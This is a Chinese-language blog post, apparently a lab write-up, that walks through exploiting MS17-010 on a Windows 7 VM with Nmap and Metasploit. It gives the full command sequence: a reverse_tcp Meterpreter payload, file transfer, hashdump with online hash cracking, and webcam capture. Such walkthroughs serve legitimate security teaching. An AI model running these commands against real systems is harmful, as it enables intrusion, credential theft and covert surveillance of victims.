漏洞原理: ● ms17_010 是一种操作系统漏洞,仅影响 Windows 系统中的 SMBv1 服务。这个漏洞是由于 SMBv1 内核函数中的缓冲区溢出而导致的。攻击者可以通过该漏洞控制目标系统,并执行任意代码。这个漏洞通过 445 文件共享端口进行利用,一旦攻击者成功利用该漏洞,就可以在目标主机上植入各种恶意软件,如勒索软件。最近出现的 WannaCry 勒索软件就使用 ms17_010 漏洞来传播和植入勒索代码,将目标系统中的所有文件加密并威胁用户付款。由于该漏洞易受攻击,且已经公开和广泛利用,因此建议 Windows 系统用户及时进行安全更新以避免被攻击。对于其渗透测试相关应用,可以使用 Metasploit 和其他渗透测试框架进行利用和测试。
环境
攻击机:Kali-Linux-2021 虚拟机IP:192.168.1.47
靶机:Windows7 虚拟机IP: 192.168.1.46
工具
Nmap:扫描工具
Metasploit:渗透框架,通过它可以很容易地获取、开发并对计算机软件漏洞实施攻击。它本身附带数千个已知软件漏洞的专业级漏洞攻击工具。
开始复现:
首先打开kali的终端,切换至管理员权限
1.输入sudo su
2.Kali密码:kali
使用Nmap工具进行扫描
1.nmap -T4 -A -v -Pn 192.168.1.46
可以发现对方的tcp445端口是开放的,然后可以尝试进行ms17-010进行漏洞攻击
通过命令启动metasploit
启用msf,命令为: msfconsole
上图是启动成功的的页面,可以使用里面的命令和模块了
搜索ms17-010的模块漏洞
命令为: search ms17-010 这里使用序号为3的auxiliary辅助模块,exploit为攻击模块
use auxiliary/scanner/smb/smb_ms17_010
1.use 3
上面出现一个问题,第一次为什么会报错,借用老师的话讲,就是空格是为了遵循语法格式,便于扫描
然后查看该模块需要的参数
1.show options
Required里面yes选项是一定要填的,必须确定一个攻击对象,可以看到缺少的是RHOSTS
设置攻击目标 RHOSTS参数是探测主机ip范围
1.set rhosts 192.168.1.46
1.show options 再查看一下配置参数
可以扫描模块了
- Run
可以发现主机是存在Ms17-010漏洞的
使用攻击模块
- use 0
已经转成了攻击模块下面了
查看下参数信息
1.show opthions
设置攻击负载(默认代码),set payload windows/x64/meterpreter/reverse_tcp
设置受害者ip(win7),set rhosts 192.168.1.46
设置攻击者ip(kali), set lhost 192.168.1.47
检查没有问题就可以进行攻击了
- run/exploit两个都是攻击指令,可以选择一个即可
这里我们看到,已经成功突破了,接下来让我们通过meterpreter看看可以做什么
首先“截屏”
1.screenshot
可以看到攻击对象的桌面已经被我摄取到了
下面让我们上传文件到对象的主机里面试试
1.upload /home/kali/Desktop/qIKKRXwj.jpeg C://
可以看到我们已经成功了,这里我是上传到了c盘里面,记住输写命令一定要“//”正反无所谓,但一定要输入双斜杠
让我们在主机里面建个123文档,内容随便输入点什么都可以,然后保存即可
返回kali下载文档,
- download c://123.txt /home/kali/Desktop
可以看到文档是已经在我们的桌面上的,说明我们已经成功了
让我们输入getuid查看权限
1.getuid
可以看到是SYSTEM权限,进入shell目录
看到很多的乱码是不是,不要慌,,跟着我输入命令
1.Chcp 65001
可以看到乱码已经消灭了,转到了主机win7目录下面,查看下它的ip
1.Ipconfig
各位看官老爷看以看到,我们是获得了主机ip的,
接下来,让我们进行下后渗透的利用,
让我们先退出主机,回到meterpreter
1.exit
让我们查看下账号和密码,
1.hashdump
首先复制粘贴,然后浏览器输入cmd5.com打开破解器
你就会发现,对方的账号密码在你面前已经无从遁形了
首先打开你的物理机,请动动小手连接你的摄影机
让我们截个图看看
1.webcam_snap
让我们打开一下摄像头,看看有什么
1.webcam_stream
以上就是ms17-010的操作。 ———————————————— 版权声明:本文为CSDN博主「星ネコ」的原创文章,遵循CC 4.0 BY-SA版权协议,转载请附上原文出处链接及本声明。 原文链接:blog.csdn.net/2302_793484…